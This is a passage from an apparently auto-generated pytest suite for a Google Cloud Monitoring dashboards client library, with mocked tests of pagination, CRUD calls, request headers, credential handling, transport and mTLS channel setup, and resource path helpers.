# Set the response to a series of pages.
call.side_effect = (
dashboards_service.ListDashboardsResponse(
dashboards=[
dashboard.Dashboard(),
dashboard.Dashboard(),
dashboard.Dashboard(),
],
next_page_token="abc",
),
dashboards_service.ListDashboardsResponse(
dashboards=[], next_page_token="def",
),
dashboards_service.ListDashboardsResponse(
dashboards=[dashboard.Dashboard(),], next_page_token="ghi",
),
dashboards_service.ListDashboardsResponse(
dashboards=[dashboard.Dashboard(), dashboard.Dashboard(),],
),
RuntimeError,
)
pages = list(client.list_dashboards(request={}).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_list_dashboards_async_pager():
client = DashboardsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_dashboards), "__call__", new_callable=mock.AsyncMock
) as call:
# Set the response to a series of pages.
call.side_effect = (
dashboards_service.ListDashboardsResponse(
dashboards=[
dashboard.Dashboard(),
dashboard.Dashboard(),
dashboard.Dashboard(),
],
next_page_token="abc",
),
dashboards_service.ListDashboardsResponse(
dashboards=[], next_page_token="def",
),
dashboards_service.ListDashboardsResponse(
dashboards=[dashboard.Dashboard(),], next_page_token="ghi",
),
dashboards_service.ListDashboardsResponse(
dashboards=[dashboard.Dashboard(), dashboard.Dashboard(),],
),
RuntimeError,
)
async_pager = await client.list_dashboards(request={},)
assert async_pager.next_page_token == "abc"
responses = []
async for response in async_pager:
responses.append(response)
assert len(responses) == 6
assert all(isinstance(i, dashboard.Dashboard) for i in responses)
@pytest.mark.asyncio
async def test_list_dashboards_async_pages():
client = DashboardsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_dashboards), "__call__", new_callable=mock.AsyncMock
) as call:
# Set the response to a series of pages.
call.side_effect = (
dashboards_service.ListDashboardsResponse(
dashboards=[
dashboard.Dashboard(),
dashboard.Dashboard(),
dashboard.Dashboard(),
],
next_page_token="abc",
),
dashboards_service.ListDashboardsResponse(
dashboards=[], next_page_token="def",
),
dashboards_service.ListDashboardsResponse(
dashboards=[dashboard.Dashboard(),], next_page_token="ghi",
),
dashboards_service.ListDashboardsResponse(
dashboards=[dashboard.Dashboard(), dashboard.Dashboard(),],
),
RuntimeError,
)
pages = []
async for page_ in (await client.list_dashboards(request={})).pages:
pages.append(page_)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.parametrize(
"request_type", [dashboards_service.GetDashboardRequest, dict,]
)
def test_get_dashboard(request_type, transport: str = "grpc"):
client = DashboardsServiceClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_dashboard), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = dashboard.Dashboard(
name="name_value",
display_name="display_name_value",
etag="etag_value",
grid_layout=layouts.GridLayout(columns=769),
)
response = client.get_dashboard(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == dashboards_service.GetDashboardRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, dashboard.Dashboard)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.etag == "etag_value"
def test_get_dashboard_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = DashboardsServiceClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_dashboard), "__call__") as call:
client.get_dashboard()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == dashboards_service.GetDashboardRequest()
@pytest.mark.asyncio
async def test_get_dashboard_async(
transport: str = "grpc_asyncio", request_type=dashboards_service.GetDashboardRequest
):
client = DashboardsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_dashboard), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
dashboard.Dashboard(
name="name_value", display_name="display_name_value", etag="etag_value",
)
)
response = await client.get_dashboard(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == dashboards_service.GetDashboardRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, dashboard.Dashboard)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.etag == "etag_value"
@pytest.mark.asyncio
async def test_get_dashboard_async_from_dict():
await test_get_dashboard_async(request_type=dict)
def test_get_dashboard_field_headers():
client = DashboardsServiceClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = dashboards_service.GetDashboardRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_dashboard), "__call__") as call:
call.return_value = dashboard.Dashboard()
client.get_dashboard(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_dashboard_field_headers_async():
client = DashboardsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = dashboards_service.GetDashboardRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_dashboard), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(dashboard.Dashboard())
await client.get_dashboard(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.parametrize(
"request_type", [dashboards_service.DeleteDashboardRequest, dict,]
)
def test_delete_dashboard(request_type, transport: str = "grpc"):
client = DashboardsServiceClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_dashboard), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
response = client.delete_dashboard(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == dashboards_service.DeleteDashboardRequest()
# Establish that the response is the type that we expect.
assert response is None
def test_delete_dashboard_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = DashboardsServiceClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_dashboard), "__call__") as call:
client.delete_dashboard()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == dashboards_service.DeleteDashboardRequest()
@pytest.mark.asyncio
async def test_delete_dashboard_async(
transport: str = "grpc_asyncio",
request_type=dashboards_service.DeleteDashboardRequest,
):
client = DashboardsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_dashboard), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
response = await client.delete_dashboard(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == dashboards_service.DeleteDashboardRequest()
# Establish that the response is the type that we expect.
assert response is None
@pytest.mark.asyncio
async def test_delete_dashboard_async_from_dict():
await test_delete_dashboard_async(request_type=dict)
def test_delete_dashboard_field_headers():
client = DashboardsServiceClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = dashboards_service.DeleteDashboardRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_dashboard), "__call__") as call:
call.return_value = None
client.delete_dashboard(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_delete_dashboard_field_headers_async():
client = DashboardsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = dashboards_service.DeleteDashboardRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_dashboard), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
await client.delete_dashboard(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.parametrize(
"request_type", [dashboards_service.UpdateDashboardRequest, dict,]
)
def test_update_dashboard(request_type, transport: str = "grpc"):
client = DashboardsServiceClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_dashboard), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = dashboard.Dashboard(
name="name_value",
display_name="display_name_value",
etag="etag_value",
grid_layout=layouts.GridLayout(columns=769),
)
response = client.update_dashboard(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == dashboards_service.UpdateDashboardRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, dashboard.Dashboard)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.etag == "etag_value"
def test_update_dashboard_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = DashboardsServiceClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_dashboard), "__call__") as call:
client.update_dashboard()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == dashboards_service.UpdateDashboardRequest()
@pytest.mark.asyncio
async def test_update_dashboard_async(
transport: str = "grpc_asyncio",
request_type=dashboards_service.UpdateDashboardRequest,
):
client = DashboardsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_dashboard), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
dashboard.Dashboard(
name="name_value", display_name="display_name_value", etag="etag_value",
)
)
response = await client.update_dashboard(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == dashboards_service.UpdateDashboardRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, dashboard.Dashboard)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.etag == "etag_value"
@pytest.mark.asyncio
async def test_update_dashboard_async_from_dict():
await test_update_dashboard_async(request_type=dict)
def test_update_dashboard_field_headers():
client = DashboardsServiceClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = dashboards_service.UpdateDashboardRequest()
request.dashboard.name = "dashboard.name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_dashboard), "__call__") as call:
call.return_value = dashboard.Dashboard()
client.update_dashboard(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "dashboard.name=dashboard.name/value",) in kw[
"metadata"
]
@pytest.mark.asyncio
async def test_update_dashboard_field_headers_async():
client = DashboardsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = dashboards_service.UpdateDashboardRequest()
request.dashboard.name = "dashboard.name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_dashboard), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(dashboard.Dashboard())
await client.update_dashboard(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "dashboard.name=dashboard.name/value",) in kw[
"metadata"
]
def test_credentials_transport_error():
# It is an error to provide credentials and a transport instance.
transport = transports.DashboardsServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = DashboardsServiceClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# It is an error to provide a credentials file and a transport instance.
transport = transports.DashboardsServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = DashboardsServiceClient(
client_options={"credentials_file": "credentials.json"},
transport=transport,
)
# It is an error to provide an api_key and a transport instance.
transport = transports.DashboardsServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
options = client_options.ClientOptions()
options.api_key = "api_key"
with pytest.raises(ValueError):
client = DashboardsServiceClient(client_options=options, transport=transport,)
# It is an error to provide an api_key and a credential.
options = mock.Mock()
options.api_key = "api_key"
with pytest.raises(ValueError):
client = DashboardsServiceClient(
client_options=options, credentials=ga_credentials.AnonymousCredentials()
)
# It is an error to provide scopes and a transport instance.
transport = transports.DashboardsServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = DashboardsServiceClient(
client_options={"scopes": ["1", "2"]}, transport=transport,
)
def test_transport_instance():
# A client may be instantiated with a custom transport instance.
transport = transports.DashboardsServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
client = DashboardsServiceClient(transport=transport)
assert client.transport is transport
def test_transport_get_channel():
# A client may be instantiated with a custom transport instance.
transport = transports.DashboardsServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
transport = transports.DashboardsServiceGrpcAsyncIOTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
@pytest.mark.parametrize(
"transport_class",
[
transports.DashboardsServiceGrpcTransport,
transports.DashboardsServiceGrpcAsyncIOTransport,
],
)
def test_transport_adc(transport_class):
# Test default credentials are used if not provided.
with mock.patch.object(google.auth, "default") as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class()
adc.assert_called_once()
def test_transport_grpc_default():
# A client should use the gRPC transport by default.
client = DashboardsServiceClient(credentials=ga_credentials.AnonymousCredentials(),)
assert isinstance(client.transport, transports.DashboardsServiceGrpcTransport,)
def test_dashboards_service_base_transport_error():
# Passing both a credentials object and credentials_file should raise an error
with pytest.raises(core_exceptions.DuplicateCredentialArgs):
transport = transports.DashboardsServiceTransport(
credentials=ga_credentials.AnonymousCredentials(),
credentials_file="credentials.json",
)
def test_dashboards_service_base_transport():
# Instantiate the base transport.
with mock.patch(
"google.cloud.monitoring_dashboard_v1.services.dashboards_service.transports.DashboardsServiceTransport.__init__"
) as Transport:
Transport.return_value = None
transport = transports.DashboardsServiceTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
# Every method on the transport should just blindly
# raise NotImplementedError.
methods = (
"create_dashboard",
"list_dashboards",
"get_dashboard",
"delete_dashboard",
"update_dashboard",
)
for method in methods:
with pytest.raises(NotImplementedError):
getattr(transport, method)(request=object())
with pytest.raises(NotImplementedError):
transport.close()
def test_dashboards_service_base_transport_with_credentials_file():
# Instantiate the base transport with a credentials file
with mock.patch.object(
google.auth, "load_credentials_from_file", autospec=True
) as load_creds, mock.patch(
"google.cloud.monitoring_dashboard_v1.services.dashboards_service.transports.DashboardsServiceTransport._prep_wrapped_messages"
) as Transport:
Transport.return_value = None
load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.DashboardsServiceTransport(
credentials_file="credentials.json", quota_project_id="octopus",
)
load_creds.assert_called_once_with(
"credentials.json",
scopes=None,
default_scopes=(
"https://www.googleapis.com/auth/cloud-platform",
"https://www.googleapis.com/auth/monitoring",
"https://www.googleapis.com/auth/monitoring.read",
"https://www.googleapis.com/auth/monitoring.write",
),
quota_project_id="octopus",
)
def test_dashboards_service_base_transport_with_adc():
# Test the default credentials are used if credentials and credentials_file are None.
with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch(
"google.cloud.monitoring_dashboard_v1.services.dashboards_service.transports.DashboardsServiceTransport._prep_wrapped_messages"
) as Transport:
Transport.return_value = None
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.DashboardsServiceTransport()
adc.assert_called_once()
def test_dashboards_service_auth_adc():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
DashboardsServiceClient()
adc.assert_called_once_with(
scopes=None,
default_scopes=(
"https://www.googleapis.com/auth/cloud-platform",
"https://www.googleapis.com/auth/monitoring",
"https://www.googleapis.com/auth/monitoring.read",
"https://www.googleapis.com/auth/monitoring.write",
),
quota_project_id=None,
)
@pytest.mark.parametrize(
"transport_class",
[
transports.DashboardsServiceGrpcTransport,
transports.DashboardsServiceGrpcAsyncIOTransport,
],
)
def test_dashboards_service_transport_auth_adc(transport_class):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class(quota_project_id="octopus", scopes=["1", "2"])
adc.assert_called_once_with(
scopes=["1", "2"],
default_scopes=(
"https://www.googleapis.com/auth/cloud-platform",
"https://www.googleapis.com/auth/monitoring",
"https://www.googleapis.com/auth/monitoring.read",
"https://www.googleapis.com/auth/monitoring.write",
),
quota_project_id="octopus",
)
@pytest.mark.parametrize(
"transport_class,grpc_helpers",
[
(transports.DashboardsServiceGrpcTransport, grpc_helpers),
(transports.DashboardsServiceGrpcAsyncIOTransport, grpc_helpers_async),
],
)
def test_dashboards_service_transport_create_channel(transport_class, grpc_helpers):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(
google.auth, "default", autospec=True
) as adc, mock.patch.object(
grpc_helpers, "create_channel", autospec=True
) as create_channel:
creds = ga_credentials.AnonymousCredentials()
adc.return_value = (creds, None)
transport_class(quota_project_id="octopus", scopes=["1", "2"])
create_channel.assert_called_with(
"monitoring.googleapis.com:443",
credentials=creds,
credentials_file=None,
quota_project_id="octopus",
default_scopes=(
"https://www.googleapis.com/auth/cloud-platform",
"https://www.googleapis.com/auth/monitoring",
"https://www.googleapis.com/auth/monitoring.read",
"https://www.googleapis.com/auth/monitoring.write",
),
scopes=["1", "2"],
default_host="monitoring.googleapis.com",
ssl_credentials=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
@pytest.mark.parametrize(
"transport_class",
[
transports.DashboardsServiceGrpcTransport,
transports.DashboardsServiceGrpcAsyncIOTransport,
],
)
def test_dashboards_service_grpc_transport_client_cert_source_for_mtls(transport_class):
cred = ga_credentials.AnonymousCredentials()
# Check ssl_channel_credentials is used if provided.
with mock.patch.object(transport_class, "create_channel") as mock_create_channel:
mock_ssl_channel_creds = mock.Mock()
transport_class(
host="squid.clam.whelk",
credentials=cred,
ssl_channel_credentials=mock_ssl_channel_creds,
)
mock_create_channel.assert_called_once_with(
"squid.clam.whelk:443",
credentials=cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_channel_creds,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Check if ssl_channel_credentials is not provided, then client_cert_source_for_mtls
# is used.
with mock.patch.object(transport_class, "create_channel", return_value=mock.Mock()):
with mock.patch("grpc.ssl_channel_credentials") as mock_ssl_cred:
transport_class(
credentials=cred,
client_cert_source_for_mtls=client_cert_source_callback,
)
expected_cert, expected_key = client_cert_source_callback()
mock_ssl_cred.assert_called_once_with(
certificate_chain=expected_cert, private_key=expected_key
)
def test_dashboards_service_host_no_port():
client = DashboardsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="monitoring.googleapis.com"
),
)
assert client.transport._host == "monitoring.googleapis.com:443"
def test_dashboards_service_host_with_port():
client = DashboardsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="monitoring.googleapis.com:8000"
),
)
assert client.transport._host == "monitoring.googleapis.com:8000"
def test_dashboards_service_grpc_transport_channel():
channel = grpc.secure_channel("http://localhost/", grpc.local_channel_credentials())
# Check that channel is used if provided.
transport = transports.DashboardsServiceGrpcTransport(
host="squid.clam.whelk", channel=channel,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
assert transport._ssl_channel_credentials == None
def test_dashboards_service_grpc_asyncio_transport_channel():
channel = aio.secure_channel("http://localhost/", grpc.local_channel_credentials())
# Check that channel is used if provided.
transport = transports.DashboardsServiceGrpcAsyncIOTransport(
host="squid.clam.whelk", channel=channel,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
assert transport._ssl_channel_credentials == None
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize(
"transport_class",
[
transports.DashboardsServiceGrpcTransport,
transports.DashboardsServiceGrpcAsyncIOTransport,
],
)
def test_dashboards_service_transport_channel_mtls_with_client_cert_source(
transport_class,
):
with mock.patch(
"grpc.ssl_channel_credentials", autospec=True
) as grpc_ssl_channel_cred:
with mock.patch.object(
transport_class, "create_channel"
) as grpc_create_channel:
mock_ssl_cred = mock.Mock()
grpc_ssl_channel_cred.return_value = mock_ssl_cred
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
cred = ga_credentials.AnonymousCredentials()
with pytest.warns(DeprecationWarning):
with mock.patch.object(google.auth, "default") as adc:
adc.return_value = (cred, None)
transport = transport_class(
host="squid.clam.whelk",
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=client_cert_source_callback,
)
adc.assert_called_once()
grpc_ssl_channel_cred.assert_called_once_with(
certificate_chain=b"cert bytes", private_key=b"key bytes"
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
assert transport._ssl_channel_credentials == mock_ssl_cred
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize(
"transport_class",
[
transports.DashboardsServiceGrpcTransport,
transports.DashboardsServiceGrpcAsyncIOTransport,
],
)
def test_dashboards_service_transport_channel_mtls_with_adc(transport_class):
mock_ssl_cred = mock.Mock()
with mock.patch.multiple(
"google.auth.transport.grpc.SslCredentials",
__init__=mock.Mock(return_value=None),
ssl_credentials=mock.PropertyMock(return_value=mock_ssl_cred),
):
with mock.patch.object(
transport_class, "create_channel"
) as grpc_create_channel:
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
mock_cred = mock.Mock()
with pytest.warns(DeprecationWarning):
transport = transport_class(
host="squid.clam.whelk",
credentials=mock_cred,
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=None,
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=mock_cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
def test_alert_policy_path():
project = "squid"
alert_policy = "clam"
expected = "projects/{project}/alertPolicies/{alert_policy}".format(
project=project, alert_policy=alert_policy,
)
actual = DashboardsServiceClient.alert_policy_path(project, alert_policy)
assert expected == actual
def test_parse_alert_policy_path():
expected = {
"project": "whelk",
"alert_policy": "octopus",
}
path = DashboardsServiceClient.alert_policy_path(**expected)
# Check that the path construction is reversible.
actual = DashboardsServiceClient.parse_alert_policy_path(path)
assert expected == actual
def test_dashboard_path():
project = "oyster"
dashboard = "nudibranch"
expected = "projects/{project}/dashboards/{dashboard}".format(
project=project, dashboard=dashboard,
)
actual = DashboardsServiceClient.dashboard_path(project, dashboard)
assert expected == actual
def test_parse_dashboard_path():
expected = {
"project": "cuttlefish",
"dashboard": "mussel",
}
path = DashboardsServiceClient.dashboard_path(**expected)
# Check that the path construction is reversible.
actual = DashboardsServiceClient.parse_dashboard_path(path)
assert expected == actual
def test_common_billing_account_path():
billing_account = "winkle"
expected = "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
actual = DashboardsServiceClient.common_billing_account_path(billing_account)
assert expected == actual
def test_parse_common_billing_account_path():
expected = {
"billing_account": "nautilus",
}
path = DashboardsServiceClient.common_billing_account_path(**expected)
# Check that the path construction is reversible.
actual = DashboardsServiceClient.parse_common_billing_account_path(path)
assert expected == actual
def test_common_folder_path():
folder = "scallop"
expected = "folders/{folder}".format(folder=folder,)
actual = DashboardsServiceClient.common_folder_path(folder)
assert expected == actual
def test_parse_common_folder_path():
expected = {
"folder": "abalone",
}
path = DashboardsServiceClient.common_folder_path(**expected)
# Check that the path construction is reversible.
actual = DashboardsServiceClient.parse_common_folder_path(path)
assert expected == actual
def test_common_organization_path():
organization = "squid"
expected = "organizations/{organization}".format(organization=organization,)
actual = DashboardsServiceClient.common_organization_path(organization)
assert expected == actual
def test_parse_common_organization_path():
expected = {
"organization": "clam",
}
path = DashboardsServiceClient.common_organization_path(**expected)
# Check that the path construction is reversible.
actual = DashboardsServiceClient.parse_common_organization_path(path)
assert expected == actual
def test_common_project_path():
project = "whelk"
expected = "projects/{project}".format(project=project,)
actual = DashboardsServiceClient.common_project_path(project)
assert expected == actual
def test_parse_common_project_path():
expected = {
"project": "octopus",
}
path = DashboardsServiceClient.common_project_path(**expected)
# Check that the path construction is reversible.
actual = DashboardsServiceClient.parse_common_project_path(path)
assert expected == actual
def test_common_location_path():
project = "oyster"
location = "nudibranch"
expected = "projects/{project}/locations/{location}".format(
project=project, location=location,
)
actual = DashboardsServiceClient.common_location_path(project, location)
assert expected == actual
def test_parse_common_location_path():
expected = {
"project": "cuttlefish",
"location": "mussel",
}
path = DashboardsServiceClient.common_location_path(**expected)
# Check that the path construction is reversible.
actual = DashboardsServiceClient.parse_common_location_path(path)
assert expected == actual
def test_client_with_default_client_info():
client_info = gapic_v1.client_info.ClientInfo()
with mock.patch.object(
transports.DashboardsServiceTransport, "_prep_wrapped_messages"
) as prep:
client = DashboardsServiceClient(
credentials=ga_credentials.AnonymousCredentials(), client_info=client_info,
)
prep.assert_called_once_with(client_info)
with mock.patch.object(
transports.DashboardsServiceTransport, "_prep_wrapped_messages"
) as prep:
transport_class = DashboardsServiceClient.get_transport_class()
transport = transport_class(
credentials=ga_credentials.AnonymousCredentials(), client_info=client_info,
)
prep.assert_called_once_with(client_info)
@pytest.mark.asyncio
async def test_transport_close_async():
client = DashboardsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc_asyncio",
)
with mock.patch.object(
type(getattr(client.transport, "grpc_channel")), "close"
) as close:
async with client:
close.assert_not_called()
close.assert_called_once()
def test_transport_close():
transports = {
"grpc": "_grpc_channel",
}
for transport, close_name in transports.items():
client = DashboardsServiceClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport
)
with mock.patch.object(
type(getattr(client.transport, close_name)), "close"
) as close:
with client:
close.assert_not_called()
close.assert_called_once()
def test_client_ctx():
transports = [
"grpc",
]
for transport in transports:
client = DashboardsServiceClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport
)
# Test client calls underlying transport.
with mock.patch.object(type(client.transport), "close") as close:
close.assert_not_called()
with client:
pass
close.assert_called()
@pytest.mark.parametrize(
"client_class,transport_class",
[
